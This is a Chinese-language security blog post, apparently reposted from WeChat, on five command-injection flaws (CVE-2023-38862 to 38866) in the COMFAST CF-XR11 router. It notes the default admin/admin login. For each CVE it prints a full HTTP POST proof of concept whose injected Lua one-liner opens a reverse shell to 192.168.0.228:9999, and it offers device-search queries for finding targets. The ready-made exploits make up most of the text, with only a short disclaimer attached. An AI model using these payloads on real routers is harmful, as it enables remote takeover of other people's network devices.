简介
Comfast CF-XR11是一款支持WiFi6的1800Mbps级无线智能网状路由器。默认登录账号密码是admin/admin。文末获取空间测绘搜索语句。
CVE-2023-38862 远程代码执行
漏洞描述
COMFAST CF-XR11 v.2.7.2 中的一个问题允许攻击者通过 bin/webmgnt 中 sub_431F64 函数的目标参数执行任意代码。
影响版本
COMFAST CF-XR11 ≤ v.2.7.2
漏洞代码
漏洞利用
POC
POST /cgi-bin/mbox-config?method=SET§ion=ping_config HTTP/1.1Host: 192.168.0.1Content-Length: 174Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Content-Type: appliation/jsonOrigin: http://192.168.0.1Referer: http://192.168.0.1/tools/tools_ping.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: COMFAST_SESSIONID=f200a8c0-581cfffffff8ffffff90ffffffd044-3a1697bdConnection: close{"destination":"127.0.0.1" && echo "`lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.0.228','9999');os.execute('/bin/sh -i <&3 >&3 2>&3 &');"`"}
1. Burp发包
2.接收到shell
CVE-2023-38863 远程代码执行
漏洞描述
COMFAST CF-XR11 v.2.7.2 中的问题允许攻击者通过 bin/webmgnt 的 sub_410074 函数中的 ifname 和 mac 参数执行任意代码。
影响版本
COMFAST CF-XR11 ≤ v.2.7.2
漏洞代码
漏洞利用
POC
POST /cgi-bin/mbox-config?method=SET§ion=wireless_device_dissoc HTTP/1.1Host: 192.168.0.1Content-Length: 172Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Content-Type: appliation/jsonOrigin: http://192.168.0.1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: COMFAST_SESSIONID=f200a8c0-581cfffffff8ffffff90ffffffd044-65dafb23Connection: close{"ifname":"127.0.0.1","mac":"1 `lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.0.228','9999');os.execute('/bin/sh -i <&3 >&3 2>&3 &');"`"}
1.Burp发包
2.接收到shell
CVE-2023-38865 远程命令执行
漏洞描述
COMFAST CF-XR11 V2.7.2 在函数 sub_4143F0 处检测到命令注入漏洞。攻击者可以向/usr/bin/webmgnt发送POST请求消息,并将命令注入到参数timestr中。
影响版本
COMFAST CF-XR11 ≤ v.2.7.2
漏洞代码
漏洞利用
POC
POST /cgi-bin/mbox-config?method=SET§ion=ntp_timezone HTTP/1.1Host: 192.168.0.1Content-Length: 298Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Content-Type: appliation/jsonOrigin: http://192.168.0.1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: COMFAST_SESSIONID=f200a8c0-581cfffffff8ffffff90ffffffd044-00000000Connection: close{"timestr":"2021-10-10 10:10:10" && echo "`lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.0.228','9999');os.execute('/bin/sh -i <&3 >&3 2>&3 &');"`", "timezone":"0","zonename": "0","hostname": "0","ntp_client_enabled":"0","ntp_enable_server":"0","ntp_servername":"0"}
1.Burp发包
2.接收到shell
CVE-2023-38866 远程命令执行
漏洞描述
COMFAST CF-XR11 V2.7.2 在函数 sub_415588 处检测到命令注入漏洞。攻击者可以向/usr/bin/webmgnt发送POST请求消息,并将命令注入到参数interface和display_name中。
影响版本
COMFAST CF-XR11 ≤ v.2.7.2
漏洞代码
漏洞利用
POC
POST /cgi-bin/mbox-config?method=SET§ion=update_interface_png HTTP/1.1Host: 192.168.0.1Content-Length: 181Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Content-Type: appliation/jsonOrigin: http://192.168.0.1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: COMFAST_SESSIONID=f200a8c0-581cfffffff8ffffff90ffffffd044-65dafb23Connection: close{"interface":" `lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.0.228','9999');os.execute('/bin/sh -i <&3 >&3 2>&3 &');"`","display_name":"&& echo 1"}
1.Burp发包
2.接收到shell
CVE-2023-38864 远程命令执行
漏洞描述
COMFAST CF-XR11 v.2.7.2 中的一个问题允许攻击者通过 bin/webmgnt 的 sub_41171C 函数中的 protal_delete_picname 参数执行任意代码。
影响版本
COMFAST CF-XR11 ≤ v.2.7.2
漏洞代码
漏洞利用
POC
POST /cgi-bin/mbox-config?method=SET§ion=wifilith_delete_pic_file HTTP/1.1Host: 192.168.0.1Content-Length: 180Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Content-Type: appliation/jsonOrigin: http://192.168.0.1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: COMFAST_SESSIONID=f200a8c0-581cfffffff8ffffff90ffffffd044-65dafb23Connection: close{"portal_delete_picname":"1.img && echo "`lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.0.228','9999');os.execute('/bin/sh -i <&3 >&3 2>&3 &');"`""}
1.Burp发包
2.接收到shell
参考链接
https://nvd.nist.gov/vuln/detail/CVE-2023-38862https://nvd.nist.gov/vuln/detail/CVE-2023-38863https://nvd.nist.gov/vuln/detail/CVE-2023-38864https://nvd.nist.gov/vuln/detail/CVE-2023-38865https://nvd.nist.gov/vuln/detail/CVE-2023-38866https://github.com/TTY-flag/my_iot_vul/tree/main/COMFAST/CF-XR11/Command_Inject1https://github.com/TTY-flag/my_iot_vul/tree/main/COMFAST/CF-XR11/Command_Inject2https://github.com/TTY-flag/my_iot_vul/tree/main/COMFAST/CF-XR11/Command_Inject3https://github.com/TTY-flag/my_iot_vul/tree/main/COMFAST/CF-XR11/Command_Inject4https://github.com/TTY-flag/my_iot_vul/tree/main/COMFAST/CF-XR11/Command_Inject5http://www.comfast.cn/http://dl.comfast.cn/firmware/CF-XR11-V2.7.2.rar
回复“CVE-2023-38862”获取空间测绘语句
仅供学习交流,勿用作违法犯罪
原文始发于微信公众号(不够安全):COMFAST CF-XR11:远程命令执行 附利用过程及POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论